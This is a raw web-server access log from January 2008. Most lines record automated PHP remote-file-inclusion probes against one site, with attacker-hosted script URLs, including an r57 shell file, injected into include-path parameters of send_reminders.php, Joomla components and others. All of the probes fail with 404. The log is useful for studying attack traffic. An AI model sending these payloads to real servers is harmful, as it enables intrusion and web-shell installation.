141.30.61.152 - - [06/Jan/2008:11:07:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:11:01 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:11:01 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:11:24 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:11:24 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:13:05 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.111.73 - - [06/Jan/2008:11:13:38 -0800] "GET /calendar/include.php?path[docroot]=http://www.sharenotesstore.com/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:14:16 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:11:15:22 -0800] "GET /!scanhttp://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:11:18:44 -0800] "GET /index.php?sub=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:11:18:44 -0800] "GET /index.php?sub=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:19:15 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:19:15 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:19:17 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:19:18 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:11:19:20 -0800] "GET /megumi/earrings/8_Venetian_E_Green_15.JPG HTTP/1.1" 200 592582 "-" "Googlebot-Image/1.0" "www.dmulk.com"
81.177.22.242 - - [06/Jan/2008:11:20:17 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
81.177.22.242 - - [06/Jan/2008:11:20:17 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:21:26 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.85.182 - - [06/Jan/2008:11:21:31 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:11:21:38 -0800] "GET /logs/access_071222.log/index.php?sub=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:11:21:38 -0800] "GET /logs/access_071222.log/index.php?sub=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:11:21:38 -0800] "GET /logs/index.php?sub=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:11:21:38 -0800] "GET /logs/index.php?sub=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:23:34 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:23:34 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:23:37 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:23:38 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:23:56 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:23:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:23:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:24:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:24:59 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:27:25 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.99.161 - - [06/Jan/2008:11:27:25 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:27:53 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:27:54 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:27:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:28:03 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:28:03 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:28:06 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:28:06 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:29:49 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:29:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:29:49 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.111.73 - - [06/Jan/2008:11:29:52 -0800] "GET /logs/access_071229.log/calendar/include.php?path[docroot]=http://www.sharenotesstore.com/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.111.73 - - [06/Jan/2008:11:29:52 -0800] "GET /logs/calendar/include.php?path[docroot]=http://www.sharenotesstore.com/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:30:00 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:30:00 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:30:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.151 - - [06/Jan/2008:11:30:01 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://zenteno.org/z/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [06/Jan/2008:11:30:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://zenteno.org/z/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [06/Jan/2008:11:30:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://zenteno.org/z/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:30:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:30:27 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:30:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:30:27 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.110.73.18 - - [06/Jan/2008:11:31:42 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://vass0ra.110mb.com/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:32:05 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [06/Jan/2008:11:32:28 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:32:35 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:32:36 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:32:36 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:11:34:28 -0800] "GET /logs/access_071205.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:11:34:28 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:11:34:29 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:11:35:45 -0800] "GET /logs/access_071229.log/!scanhttp://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:11:35:45 -0800] "GET /logs/!scanhttp://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:36:25 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:36:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:36:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.33.126 - - [06/Jan/2008:11:37:53 -0800] "GET /logs/access_071229.log/100http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.98.33.126 - - [06/Jan/2008:11:37:53 -0800] "GET /100http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.98.33.126 - - [06/Jan/2008:11:37:53 -0800] "GET /logs/100http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.47.36.16 - - [06/Jan/2008:11:39:08 -0800] "GET /calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.16 - - [06/Jan/2008:11:39:30 -0800] "GET /logs/access_071229.log/calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.16 - - [06/Jan/2008:11:39:30 -0800] "GET /calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.16 - - [06/Jan/2008:11:39:30 -0800] "GET /logs/calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.11 - - [06/Jan/2008:11:39:46 -0800] "GET /logs/access_071229.log/calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.11 - - [06/Jan/2008:11:39:46 -0800] "GET /calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.11 - - [06/Jan/2008:11:39:46 -0800] "GET /logs/calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.98.33.126 - - [06/Jan/2008:11:41:38 -0800] "GET /logs/access_071219.log/100http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.47.36.11 - - [06/Jan/2008:11:41:42 -0800] "GET /calendar/include.php?path[docroot]=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:42:36 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:42:36 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:42:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:42:42 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:42:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:42:43 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.77.54 - - [06/Jan/2008:11:42:46 -0800] "GET /calendar/include.php?path[docroot]=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.156 - - [06/Jan/2008:11:43:14 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:43:34 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:43:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:43:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:44:26 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:44:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:44:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:11:44:32 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:47:50 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:47:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:11:47:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.10.62.134 - - [06/Jan/2008:11:48:42 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://r5f5i5.nm.ru/tool/666.tester? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
87.10.62.134 - - [06/Jan/2008:11:48:42 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://r5f5i5.nm.ru/tool/666.tester? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:51:07 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:51:07 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:11:51:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.115.186.10 - - [06/Jan/2008:11:52:33 -0800] "GET /logs/access_071229.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.115.186.10 - - [06/Jan/2008:11:52:33 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.115.186.10 - - [06/Jan/2008:11:52:34 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:52:52 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.44.108 - - [06/Jan/2008:11:52:52 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://growingkids.org/forum/rasa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:11:55:29 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [06/Jan/2008:11:55:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:11:55:42 -0800] "GET //common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:11:55:42 -0800] "GET /logs//common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.24.164 - - [06/Jan/2008:11:56:50 -0800] "GET /logs/access_071222.log HTTP/1.0" 200 103077 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.145 - - [06/Jan/2008:11:57:14 -0800] "GET /minamijewelry/source_images/batch1/?N=D HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:11:58:49 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:11:59:57 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:11:59:57 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
